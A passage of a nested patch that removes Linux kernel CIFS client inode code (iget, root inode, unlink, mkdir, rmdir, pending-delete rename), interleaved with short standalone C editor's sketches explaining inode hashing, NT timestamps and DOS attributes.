+-		/*
+-		 * For SMB2 and later the backup intent flag
+-		 * is already sent if needed on open and there
+-		 * is no path based FindFirst operation to use
+-		 * to retry with so nothing we can do, bail out
+-		 */
+-		goto out;
+-	default:
+-		cifs_dbg(FYI, "%s: unhandled err rc %d\n", __func__, rc);
+-		goto out;
+-	}
+-
+-
+-	/*
+-	 * 3. Tweak fattr based on mount options
+-	 */
+-
+-	/* check for Minshall+French symlinks */
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS) {
+-		tmprc = check_mf_symlink(xid, tcon, cifs_sb, &fattr,
+-					 full_path);
+-		if (tmprc)
+-			cifs_dbg(FYI, "check_mf_symlink: %d\n", tmprc);
+-	}
+-
+-	/*
+-	 * 4. Update inode with final fattr data
+-	 */
+-
+-	if (!*inode) {
+-		*inode = cifs_iget(sb, &fattr);
+-		if (!*inode)
+-			rc = -ENOMEM;
+-	} else {
+-		/* we already have inode, update it */
+-
+-		/* if uniqueid is different, return error */
+-		if (unlikely(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM &&
+-		    CIFS_I(*inode)->uniqueid != fattr.cf_uniqueid)) {
+-			CIFS_I(*inode)->time = 0; /* force reval */
+-			rc = -ESTALE;
+-			goto out;
+-		}
+-
+-		/* if filetype is different, return error */
+-		rc = cifs_fattr_to_inode(*inode, &fattr);
+-	}
+-out:
+-	cifs_put_tlink(tlink);
+-	cifs_free_open_info(&data);
+-	kfree(fattr.cf_symlink_target);
+-	return rc;
+-}
+-
+-
+-static const struct inode_operations cifs_ipc_inode_ops = {
+-	.lookup = cifs_lookup,
+-};
+-
+-static int
+-cifs_find_inode(struct inode *inode, void *opaque)
+-{
+-	struct cifs_fattr *fattr = opaque;
+-
+-	/* don't match inode with different uniqueid */
+-	if (CIFS_I(inode)->uniqueid != fattr->cf_uniqueid)
+-		return 0;
+-
+-	/* use createtime like an i_generation field */
+-	if (CIFS_I(inode)->createtime != fattr->cf_createtime)
+-		return 0;
+-
+-	/* don't match inode of different type */
+-	if (inode_wrong_type(inode, fattr->cf_mode))
+-		return 0;
+-
+-	/* if it's not a directory or has no dentries, then flag it */
+-	if (S_ISDIR(inode->i_mode) && !hlist_empty(&inode->i_dentry))
+-		fattr->cf_flags |= CIFS_FATTR_INO_COLLISION;
+-
+-	return 1;
+-}
+-
+-static int
+-cifs_init_inode(struct inode *inode, void *opaque)
+-{
+-	struct cifs_fattr *fattr = opaque;
+-
+-	CIFS_I(inode)->uniqueid = fattr->cf_uniqueid;
+-	CIFS_I(inode)->createtime = fattr->cf_createtime;
+-	return 0;
+-}
+-
+-/*
+- * walk dentry list for an inode and report whether it has aliases that
+- * are hashed. We use this to determine if a directory inode can actually
+- * be used.
+- */
+-static bool
+-inode_has_hashed_dentries(struct inode *inode)
+-{
+-	struct dentry *dentry;
+-
+-	spin_lock(&inode->i_lock);
+-	hlist_for_each_entry(dentry, &inode->i_dentry, d_u.d_alias) {
+-		if (!d_unhashed(dentry) || IS_ROOT(dentry)) {
+-			spin_unlock(&inode->i_lock);
+-			return true;
+-		}
+-	}
+-	spin_unlock(&inode->i_lock);
+-	return false;
+-}
+-
+-/* Given fattrs, get a corresponding inode */
+-struct inode *
+-cifs_iget(struct super_block *sb, struct cifs_fattr *fattr)
+-{
+-	unsigned long hash;
+-	struct inode *inode;
+-
+-retry_iget5_locked:
+-	cifs_dbg(FYI, "looking for uniqueid=%llu\n", fattr->cf_uniqueid);
+-
+-	/* hash down to 32-bits on 32-bit arch */
+-	hash = cifs_uniqueid_to_ino_t(fattr->cf_uniqueid);
+-
+-	inode = iget5_locked(sb, hash, cifs_find_inode, cifs_init_inode, fattr);
+-	if (inode) {
+-		/* was there a potentially problematic inode collision? */
+-		if (fattr->cf_flags & CIFS_FATTR_INO_COLLISION) {
+-			fattr->cf_flags &= ~CIFS_FATTR_INO_COLLISION;
+-
+-			if (inode_has_hashed_dentries(inode)) {
+-				cifs_autodisable_serverino(CIFS_SB(sb));
+-				iput(inode);
+-				fattr->cf_uniqueid = iunique(sb, ROOT_I);
+-				goto retry_iget5_locked;
+-			}
+-		}
+-
+-		/* can't fail - see cifs_find_inode() */
+-		cifs_fattr_to_inode(inode, fattr);
+-		if (sb->s_flags & SB_NOATIME)
+-			inode->i_flags |= S_NOATIME | S_NOCMTIME;
+-		if (inode->i_state & I_NEW) {
+-			inode->i_ino = hash;
+-			cifs_fscache_get_inode_cookie(inode);
+-			unlock_new_inode(inode);
+-		}
+-	}
+-
+-	return inode;
+-}
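/*
 * Editor's note: sketch with an assumption flagged. cifs_iget() above
 * hashes the 64-bit uniqueid down to an ino_t for iget5_locked(); on
 * 32-bit hosts this kind of narrowing is commonly done by XOR-folding
 * the high half into the low half, which is the shape modelled here.
 */
#include <stdio.h>
#include <stdint.h>

static uint32_t fold_uniqueid(uint64_t fileid)
{
	/* assumed fold: high 32 bits XORed into the low 32 bits */
	return (uint32_t)fileid ^ (uint32_t)(fileid >> 32);
}

int main(void)
{
	uint64_t uniqueid = 0x0000000400000001ULL;

	printf("ino: 0x%08x\n", fold_uniqueid(uniqueid));
	return 0;
}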
+-
+-/* gets root inode */
+-struct inode *cifs_root_iget(struct super_block *sb)
+-{
+-	unsigned int xid;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct inode *inode = NULL;
+-	long rc;
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	char *path = NULL;
+-	int len;
+-
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH)
+-	    && cifs_sb->prepath) {
+-		len = strlen(cifs_sb->prepath);
+-		path = kzalloc(len + 2 /* leading sep + null */, GFP_KERNEL);
+-		if (path == NULL)
+-			return ERR_PTR(-ENOMEM);
+-		path[0] = '/';
+-		memcpy(path+1, cifs_sb->prepath, len);
+-	} else {
+-		path = kstrdup("", GFP_KERNEL);
+-		if (path == NULL)
+-			return ERR_PTR(-ENOMEM);
+-	}
+-
+-	xid = get_xid();
+-	if (tcon->unix_ext) {
+-		rc = cifs_get_inode_info_unix(&inode, path, sb, xid);
+-		/* some servers mistakenly claim POSIX support */
+-		if (rc != -EOPNOTSUPP)
+-			goto iget_no_retry;
+-		cifs_dbg(VFS, "server does not support POSIX extensions\n");
+-		tcon->unix_ext = false;
+-	}
+-
+-	convert_delimiter(path, CIFS_DIR_SEP(cifs_sb));
+-	if (tcon->posix_extensions)
+-		rc = smb311_posix_get_inode_info(&inode, path, sb, xid);
+-	else
+-		rc = cifs_get_inode_info(&inode, path, NULL, sb, xid, NULL);
+-
+-iget_no_retry:
+-	if (!inode) {
+-		inode = ERR_PTR(rc);
+-		goto out;
+-	}
+-
+-	if (rc && tcon->pipe) {
+-		cifs_dbg(FYI, "ipc connection - fake read inode\n");
+-		spin_lock(&inode->i_lock);
+-		inode->i_mode |= S_IFDIR;
+-		set_nlink(inode, 2);
+-		inode->i_op = &cifs_ipc_inode_ops;
+-		inode->i_fop = &simple_dir_operations;
+-		inode->i_uid = cifs_sb->ctx->linux_uid;
+-		inode->i_gid = cifs_sb->ctx->linux_gid;
+-		spin_unlock(&inode->i_lock);
+-	} else if (rc) {
+-		iget_failed(inode);
+-		inode = ERR_PTR(rc);
+-	}
+-
+-out:
+-	kfree(path);
+-	free_xid(xid);
+-	return inode;
+-}
+-
+-int
+-cifs_set_file_info(struct inode *inode, struct iattr *attrs, unsigned int xid,
+-		   const char *full_path, __u32 dosattr)
+-{
+-	bool set_time = false;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct TCP_Server_Info *server;
+-	FILE_BASIC_INFO	info_buf;
+-
+-	if (attrs == NULL)
+-		return -EINVAL;
+-
+-	server = cifs_sb_master_tcon(cifs_sb)->ses->server;
+-	if (!server->ops->set_file_info)
+-		return -ENOSYS;
+-
+-	info_buf.Pad = 0;
+-
+-	if (attrs->ia_valid & ATTR_ATIME) {
+-		set_time = true;
+-		info_buf.LastAccessTime =
+-			cpu_to_le64(cifs_UnixTimeToNT(attrs->ia_atime));
+-	} else
+-		info_buf.LastAccessTime = 0;
+-
+-	if (attrs->ia_valid & ATTR_MTIME) {
+-		set_time = true;
+-		info_buf.LastWriteTime =
+-		    cpu_to_le64(cifs_UnixTimeToNT(attrs->ia_mtime));
+-	} else
+-		info_buf.LastWriteTime = 0;
+-
+-	/*
+-	 * Samba throws this field away, but windows may actually use it.
+-	 * Do not set ctime unless other time stamps are changed explicitly
+-	 * (i.e. by utimes()) since we would then have a mix of client and
+-	 * server times.
+-	 */
+-	if (set_time && (attrs->ia_valid & ATTR_CTIME)) {
+-		cifs_dbg(FYI, "CIFS - CTIME changed\n");
+-		info_buf.ChangeTime =
+-		    cpu_to_le64(cifs_UnixTimeToNT(attrs->ia_ctime));
+-	} else
+-		info_buf.ChangeTime = 0;
+-
+-	info_buf.CreationTime = 0;	/* don't change */
+-	info_buf.Attributes = cpu_to_le32(dosattr);
+-
+-	return server->ops->set_file_info(inode, full_path, &info_buf, xid);
+-}
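/*
 * Editor's note: illustration, not patch content. cifs_set_file_info()
 * above stores timestamps via cifs_UnixTimeToNT(); NT time counts
 * 100-nanosecond intervals since 1601-01-01, so the conversion is
 * (unix_seconds + 11644473600) * 10000000:
 */
#include <stdio.h>
#include <stdint.h>

#define NTFS_TIME_OFFSET 11644473600ULL /* seconds between 1601 and 1970 */

static uint64_t unix_to_nt(uint64_t unix_sec)
{
	return (unix_sec + NTFS_TIME_OFFSET) * 10000000ULL;
}

int main(void)
{
	/* the Unix epoch itself maps to 116444736000000000 NT ticks */
	printf("epoch 0 -> NT %llu\n", (unsigned long long)unix_to_nt(0));
	return 0;
}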
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-/*
+- * Open the given file (if it isn't already), set the DELETE_ON_CLOSE bit
+- * and rename it to a random name that hopefully won't conflict with
+- * anything else.
+- */
+-int
+-cifs_rename_pending_delete(const char *full_path, struct dentry *dentry,
+-			   const unsigned int xid)
+-{
+-	int oplock = 0;
+-	int rc;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	struct inode *inode = d_inode(dentry);
+-	struct cifsInodeInfo *cifsInode = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	__u32 dosattr, origattr;
+-	FILE_BASIC_INFO *info_buf = NULL;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-
+-	/*
+-	 * We cannot rename the file if the server doesn't support
+-	 * CAP_INFOLEVEL_PASSTHRU
+-	 */
+-	if (!(tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)) {
+-		rc = -EBUSY;
+-		goto out;
+-	}
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = DELETE | FILE_WRITE_ATTRIBUTES,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+-		.disposition = FILE_OPEN,
+-		.path = full_path,
+-		.fid = &fid,
+-	};
+-
+-	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+-	if (rc != 0)
+-		goto out;
+-
+-	origattr = cifsInode->cifsAttrs;
+-	if (origattr == 0)
+-		origattr |= ATTR_NORMAL;
+-
+-	dosattr = origattr & ~ATTR_READONLY;
+-	if (dosattr == 0)
+-		dosattr |= ATTR_NORMAL;
+-	dosattr |= ATTR_HIDDEN;
+-
+-	/* set ATTR_HIDDEN and clear ATTR_READONLY, but only if needed */
+-	if (dosattr != origattr) {
+-		info_buf = kzalloc(sizeof(*info_buf), GFP_KERNEL);
+-		if (info_buf == NULL) {
+-			rc = -ENOMEM;
+-			goto out_close;
+-		}
+-		info_buf->Attributes = cpu_to_le32(dosattr);
+-		rc = CIFSSMBSetFileInfo(xid, tcon, info_buf, fid.netfid,
+-					current->tgid);
+-		/* although we would like to mark the file hidden,
+-		   if that fails we will still try to rename it */
+-		if (!rc)
+-			cifsInode->cifsAttrs = dosattr;
+-		else
+-			dosattr = origattr; /* since not able to change them */
+-	}
+-
+-	/* rename the file */
+-	rc = CIFSSMBRenameOpenFile(xid, tcon, fid.netfid, NULL,
+-				   cifs_sb->local_nls,
+-				   cifs_remap(cifs_sb));
+-	if (rc != 0) {
+-		rc = -EBUSY;
+-		goto undo_setattr;
+-	}
+-
+-	/* try to set DELETE_ON_CLOSE */
+-	if (!test_bit(CIFS_INO_DELETE_PENDING, &cifsInode->flags)) {
+-		rc = CIFSSMBSetFileDisposition(xid, tcon, true, fid.netfid,
+-					       current->tgid);
+-		/*
+-		 * some samba versions return -ENOENT when we try to set the
+-		 * file disposition here. Likely a samba bug, but work around
+-		 * it for now. This means that some cifsXXX files may hang
+-		 * around after they shouldn't.
+-		 *
+-		 * BB: remove this hack after more servers have the fix
+-		 */
+-		if (rc == -ENOENT)
+-			rc = 0;
+-		else if (rc != 0) {
+-			rc = -EBUSY;
+-			goto undo_rename;
+-		}
+-		set_bit(CIFS_INO_DELETE_PENDING, &cifsInode->flags);
+-	}
+-
+-out_close:
+-	CIFSSMBClose(xid, tcon, fid.netfid);
+-out:
+-	kfree(info_buf);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-
+-	/*
+-	 * reset everything back to the original state. Don't bother
+-	 * dealing with errors here since we can't do anything about
+-	 * them anyway.
+-	 */
+-undo_rename:
+-	CIFSSMBRenameOpenFile(xid, tcon, fid.netfid, dentry->d_name.name,
+-				cifs_sb->local_nls, cifs_remap(cifs_sb));
+-undo_setattr:
+-	if (dosattr != origattr) {
+-		info_buf->Attributes = cpu_to_le32(origattr);
+-		if (!CIFSSMBSetFileInfo(xid, tcon, info_buf, fid.netfid,
+-					current->tgid))
+-			cifsInode->cifsAttrs = origattr;
+-	}
+-
+-	goto out_close;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
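/*
 * Editor's note: a standalone sketch of the attribute dance used by
 * the deleted rename_pending_delete path: clear READONLY, fall back to
 * NORMAL if nothing is left, then add HIDDEN. The attribute values are
 * the usual SMB/DOS bits, restated here for the demo.
 */
#include <stdio.h>

#define ATTR_READONLY 0x0001
#define ATTR_HIDDEN   0x0002
#define ATTR_NORMAL   0x0080

int main(void)
{
	unsigned int origattr = ATTR_READONLY;
	unsigned int dosattr;

	if (origattr == 0)
		origattr |= ATTR_NORMAL;

	dosattr = origattr & ~ATTR_READONLY;  /* writable so it can be renamed */
	if (dosattr == 0)
		dosattr |= ATTR_NORMAL;       /* zero is not a valid attribute set */
	dosattr |= ATTR_HIDDEN;               /* hide the doomed file */

	printf("orig 0x%04x -> pending-delete 0x%04x\n", origattr, dosattr);
	return 0;
}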
+-
+-/* copied from fs/nfs/dir.c with small changes */
+-static void
+-cifs_drop_nlink(struct inode *inode)
+-{
+-	spin_lock(&inode->i_lock);
+-	if (inode->i_nlink > 0)
+-		drop_nlink(inode);
+-	spin_unlock(&inode->i_lock);
+-}
+-
+-/*
+- * If d_inode(dentry) is null (usually meaning the cached dentry
+- * is a negative dentry), then we attempt a standard SMB delete, but
+- * if that fails we cannot attempt the fallback mechanisms on EACCES
+- * and instead return the EACCES to the caller. Note that the VFS does
+- * not currently call unlink on negative dentries.
+- */
+-int cifs_unlink(struct inode *dir, struct dentry *dentry)
+-{
+-	int rc = 0;
+-	unsigned int xid;
+-	const char *full_path;
+-	void *page;
+-	struct inode *inode = d_inode(dentry);
+-	struct cifsInodeInfo *cifs_inode;
+-	struct super_block *sb = dir->i_sb;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct iattr *attrs = NULL;
+-	__u32 dosattr = 0, origattr = 0;
+-
+-	cifs_dbg(FYI, "cifs_unlink, dir=0x%p, dentry=0x%p\n", dir, dentry);
+-
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-	server = tcon->ses->server;
+-
+-	xid = get_xid();
+-	page = alloc_dentry_path();
+-
+-	if (tcon->nodelete) {
+-		rc = -EACCES;
+-		goto unlink_out;
+-	}
+-
+-	/* Unlink can be called from rename, so we cannot take the
+-	 * sb->s_vfs_rename_mutex here */
+-	full_path = build_path_from_dentry(dentry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto unlink_out;
+-	}
+-
+-	cifs_close_deferred_file_under_dentry(tcon, full_path);
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (cap_unix(tcon->ses) && (CIFS_UNIX_POSIX_PATH_OPS_CAP &
+-				le64_to_cpu(tcon->fsUnixInfo.Capability))) {
+-		rc = CIFSPOSIXDelFile(xid, tcon, full_path,
+-			SMB_POSIX_UNLINK_FILE_TARGET, cifs_sb->local_nls,
+-			cifs_remap(cifs_sb));
+-		cifs_dbg(FYI, "posix del rc %d\n", rc);
+-		if ((rc == 0) || (rc == -ENOENT))
+-			goto psx_del_no_retry;
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-retry_std_delete:
+-	if (!server->ops->unlink) {
+-		rc = -ENOSYS;
+-		goto psx_del_no_retry;
+-	}
+-
+-	rc = server->ops->unlink(xid, tcon, full_path, cifs_sb);
+-
+-psx_del_no_retry:
+-	if (!rc) {
+-		if (inode)
+-			cifs_drop_nlink(inode);
+-	} else if (rc == -ENOENT) {
+-		d_drop(dentry);
+-	} else if (rc == -EBUSY) {
+-		if (server->ops->rename_pending_delete) {
+-			rc = server->ops->rename_pending_delete(full_path,
+-								dentry, xid);
+-			if (rc == 0)
+-				cifs_drop_nlink(inode);
+-		}
+-	} else if ((rc == -EACCES) && (dosattr == 0) && inode) {
+-		attrs = kzalloc(sizeof(*attrs), GFP_KERNEL);
+-		if (attrs == NULL) {
+-			rc = -ENOMEM;
+-			goto out_reval;
+-		}
+-
+-		/* try to reset dos attributes */
+-		cifs_inode = CIFS_I(inode);
+-		origattr = cifs_inode->cifsAttrs;
+-		if (origattr == 0)
+-			origattr |= ATTR_NORMAL;
+-		dosattr = origattr & ~ATTR_READONLY;
+-		if (dosattr == 0)
+-			dosattr |= ATTR_NORMAL;
+-		dosattr |= ATTR_HIDDEN;
+-
+-		rc = cifs_set_file_info(inode, attrs, xid, full_path, dosattr);
+-		if (rc != 0)
+-			goto out_reval;
+-
+-		goto retry_std_delete;
+-	}
+-
+-	/* undo the setattr if we errored out and it's needed */
+-	if (rc != 0 && dosattr != 0)
+-		cifs_set_file_info(inode, attrs, xid, full_path, origattr);
+-
+-out_reval:
+-	if (inode) {
+-		cifs_inode = CIFS_I(inode);
+-		cifs_inode->time = 0;	/* will force revalidate to get info
+-					   when needed */
+-		inode->i_ctime = current_time(inode);
+-	}
+-	dir->i_ctime = dir->i_mtime = current_time(dir);
+-	cifs_inode = CIFS_I(dir);
+-	CIFS_I(dir)->time = 0;	/* force revalidate of dir as well */
+-unlink_out:
+-	free_dentry_path(page);
+-	kfree(attrs);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-static int
+-cifs_mkdir_qinfo(struct inode *parent, struct dentry *dentry, umode_t mode,
+-		 const char *full_path, struct cifs_sb_info *cifs_sb,
+-		 struct cifs_tcon *tcon, const unsigned int xid)
+-{
+-	int rc = 0;
+-	struct inode *inode = NULL;
+-
+-	if (tcon->posix_extensions)
+-		rc = smb311_posix_get_inode_info(&inode, full_path, parent->i_sb, xid);
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	else if (tcon->unix_ext)
+-		rc = cifs_get_inode_info_unix(&inode, full_path, parent->i_sb,
+-					      xid);
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	else
+-		rc = cifs_get_inode_info(&inode, full_path, NULL, parent->i_sb,
+-					 xid, NULL);
+-
+-	if (rc)
+-		return rc;
+-
+-	if (!S_ISDIR(inode->i_mode)) {
+-		/*
+-		 * mkdir succeeded, but another client has managed to remove the
+-		 * sucker and replace it with a non-directory. Return success,
+-		 * but don't leave the child in dcache.
+-		 */
+-		 iput(inode);
+-		 d_drop(dentry);
+-		 return 0;
+-	}
+-	/*
+-	 * Setting nlink is not necessary except in cases where we failed to
+-	 * get it from the server or it was set bogus. Also, since this is a
+-	 * brand new inode, no need to grab the i_lock before setting i_nlink.
+-	 */
+-	if (inode->i_nlink < 2)
+-		set_nlink(inode, 2);
+-	mode &= ~current_umask();
+-	/* must turn on setgid bit if parent dir has it */
+-	if (parent->i_mode & S_ISGID)
+-		mode |= S_ISGID;
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (tcon->unix_ext) {
+-		struct cifs_unix_set_info_args args = {
+-			.mode	= mode,
+-			.ctime	= NO_CHANGE_64,
+-			.atime	= NO_CHANGE_64,
+-			.mtime	= NO_CHANGE_64,
+-			.device	= 0,
+-		};
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
+-			args.uid = current_fsuid();
+-			if (parent->i_mode & S_ISGID)
+-				args.gid = parent->i_gid;
+-			else
+-				args.gid = current_fsgid();
+-		} else {
+-			args.uid = INVALID_UID; /* no change */
+-			args.gid = INVALID_GID; /* no change */
+-		}
+-		CIFSSMBUnixSetPathInfo(xid, tcon, full_path, &args,
+-				       cifs_sb->local_nls,
+-				       cifs_remap(cifs_sb));
+-	} else {
+-#else
+-	{
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-		struct TCP_Server_Info *server = tcon->ses->server;
+-		if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) &&
+-		    (mode & S_IWUGO) == 0 && server->ops->mkdir_setinfo)
+-			server->ops->mkdir_setinfo(inode, full_path, cifs_sb,
+-						   tcon, xid);
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)
+-			inode->i_mode = (mode | S_IFDIR);
+-
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
+-			inode->i_uid = current_fsuid();
+-			if (inode->i_mode & S_ISGID)
+-				inode->i_gid = parent->i_gid;
+-			else
+-				inode->i_gid = current_fsgid();
+-		}
+-	}
+-	d_instantiate(dentry, inode);
+-	return 0;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static int
+-cifs_posix_mkdir(struct inode *inode, struct dentry *dentry, umode_t mode,
+-		 const char *full_path, struct cifs_sb_info *cifs_sb,
+-		 struct cifs_tcon *tcon, const unsigned int xid)
+-{
+-	int rc = 0;
+-	u32 oplock = 0;
+-	FILE_UNIX_BASIC_INFO *info = NULL;
+-	struct inode *newinode = NULL;
+-	struct cifs_fattr fattr;
+-
+-	info = kzalloc(sizeof(FILE_UNIX_BASIC_INFO), GFP_KERNEL);
+-	if (info == NULL) {
+-		rc = -ENOMEM;
+-		goto posix_mkdir_out;
+-	}
+-
+-	mode &= ~current_umask();
+-	rc = CIFSPOSIXCreate(xid, tcon, SMB_O_DIRECTORY | SMB_O_CREAT, mode,
+-			     NULL /* netfid */, info, &oplock, full_path,
+-			     cifs_sb->local_nls, cifs_remap(cifs_sb));
+-	if (rc == -EOPNOTSUPP)
+-		goto posix_mkdir_out;
+-	else if (rc) {
+-		cifs_dbg(FYI, "posix mkdir returned 0x%x\n", rc);
+-		d_drop(dentry);
+-		goto posix_mkdir_out;
+-	}
+-
+-	if (info->Type == cpu_to_le32(-1))
+-		/* no return info, go query for it */
+-		goto posix_mkdir_get_info;
+-	/*
+-	 * BB check (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) to see if
+-	 * we need to set uid/gid.
+-	 */
+-
+-	cifs_unix_basic_to_fattr(&fattr, info, cifs_sb);
+-	cifs_fill_uniqueid(inode->i_sb, &fattr);
+-	newinode = cifs_iget(inode->i_sb, &fattr);
+-	if (!newinode)
+-		goto posix_mkdir_get_info;
+-
+-	d_instantiate(dentry, newinode);
+-
+-#ifdef CONFIG_CIFS_DEBUG2
+-	cifs_dbg(FYI, "instantiated dentry %p %pd to inode %p\n",
+-		 dentry, dentry, newinode);
+-
+-	if (newinode->i_nlink != 2)
+-		cifs_dbg(FYI, "unexpected number of links %d\n",
+-			 newinode->i_nlink);
+-#endif
+-
+-posix_mkdir_out:
+-	kfree(info);
+-	return rc;
+-posix_mkdir_get_info:
+-	rc = cifs_mkdir_qinfo(inode, dentry, mode, full_path, cifs_sb, tcon,
+-			      xid);
+-	goto posix_mkdir_out;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-int cifs_mkdir(struct user_namespace *mnt_userns, struct inode *inode,
+-	       struct dentry *direntry, umode_t mode)
+-{
+-	int rc = 0;
+-	unsigned int xid;
+-	struct cifs_sb_info *cifs_sb;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	const char *full_path;
+-	void *page;
+-
+-	cifs_dbg(FYI, "In cifs_mkdir, mode = %04ho inode = 0x%p\n",
+-		 mode, inode);
+-
+-	cifs_sb = CIFS_SB(inode->i_sb);
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	tcon = tlink_tcon(tlink);
+-
+-	xid = get_xid();
+-
+-	page = alloc_dentry_path();
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto mkdir_out;
+-	}
+-
+-	server = tcon->ses->server;
+-
+-	if ((server->ops->posix_mkdir) && (tcon->posix_extensions)) {
+-		rc = server->ops->posix_mkdir(xid, inode, mode, tcon, full_path,
+-					      cifs_sb);
+-		d_drop(direntry); /* for time being always refresh inode info */
+-		goto mkdir_out;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	if (cap_unix(tcon->ses) && (CIFS_UNIX_POSIX_PATH_OPS_CAP &
+-				le64_to_cpu(tcon->fsUnixInfo.Capability))) {
+-		rc = cifs_posix_mkdir(inode, direntry, mode, full_path, cifs_sb,
+-				      tcon, xid);
+-		if (rc != -EOPNOTSUPP)
+-			goto mkdir_out;
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	if (!server->ops->mkdir) {
+-		rc = -ENOSYS;
+-		goto mkdir_out;
+-	}
+-
+-	/* BB add setting the equivalent of mode via CreateX w/ACLs */
+-	rc = server->ops->mkdir(xid, inode, mode, tcon, full_path, cifs_sb);
+-	if (rc) {
+-		cifs_dbg(FYI, "cifs_mkdir returned 0x%x\n", rc);
+-		d_drop(direntry);
+-		goto mkdir_out;
+-	}
+-
+-	/* TODO: skip this for smb2/smb3 */
+-	rc = cifs_mkdir_qinfo(inode, direntry, mode, full_path, cifs_sb, tcon,
+-			      xid);
+-mkdir_out:
+-	/*
+-	 * Force revalidate to get parent dir info when needed since cached
+-	 * attributes are invalid now.
+-	 */
+-	CIFS_I(inode)->time = 0;
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-int cifs_rmdir(struct inode *inode, struct dentry *direntry)
+-{
+-	int rc = 0;
+-	unsigned int xid;
+-	struct cifs_sb_info *cifs_sb;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	const char *full_path;
+-	void *page = alloc_dentry_path();
+-	struct cifsInodeInfo *cifsInode;
+-
+-	cifs_dbg(FYI, "cifs_rmdir, inode = 0x%p\n", inode);
+-
+-	xid = get_xid();
+-
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto rmdir_exit;
+-	}
+-
+-	cifs_sb = CIFS_SB(inode->i_sb);
+-	if (unlikely(cifs_forced_shutdown(cifs_sb))) {
+-		rc = -EIO;
+-		goto rmdir_exit;
+-	}
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink)) {
+-		rc = PTR_ERR(tlink);
+-		goto rmdir_exit;
+-	}
+-	tcon = tlink_tcon(tlink);
+-	server = tcon->ses->server;
+-
+-	if (!server->ops->rmdir) {
+-		rc = -ENOSYS;
+-		cifs_put_tlink(tlink);
+-		goto rmdir_exit;
+-	}
+-
+-	if (tcon->nodelete) {
+-		rc = -EACCES;
+-		cifs_put_tlink(tlink);
+-		goto rmdir_exit;
+-	}
+-
+-	rc = server->ops->rmdir(xid, tcon, full_path, cifs_sb);
+-	cifs_put_tlink(tlink);
+-
+-	if (!rc) {
+-		spin_lock(&d_inode(direntry)->i_lock);
+-		i_size_write(d_inode(direntry), 0);
+-		clear_nlink(d_inode(direntry));
+-		spin_unlock(&d_inode(direntry)->i_lock);
+-	}
+-
+-	cifsInode = CIFS_I(d_inode(direntry));
+-	/* force revalidate to go get info when needed */
+-	cifsInode->time = 0;
+-
+-	cifsInode = CIFS_I(inode);
+-	/*
+-	 * Force revalidate to get parent dir info when needed since cached
+-	 * attributes are invalid now.
+-	 */
+-	cifsInode->time = 0;
+-
+-	d_inode(direntry)->i_ctime = inode->i_ctime = inode->i_mtime =
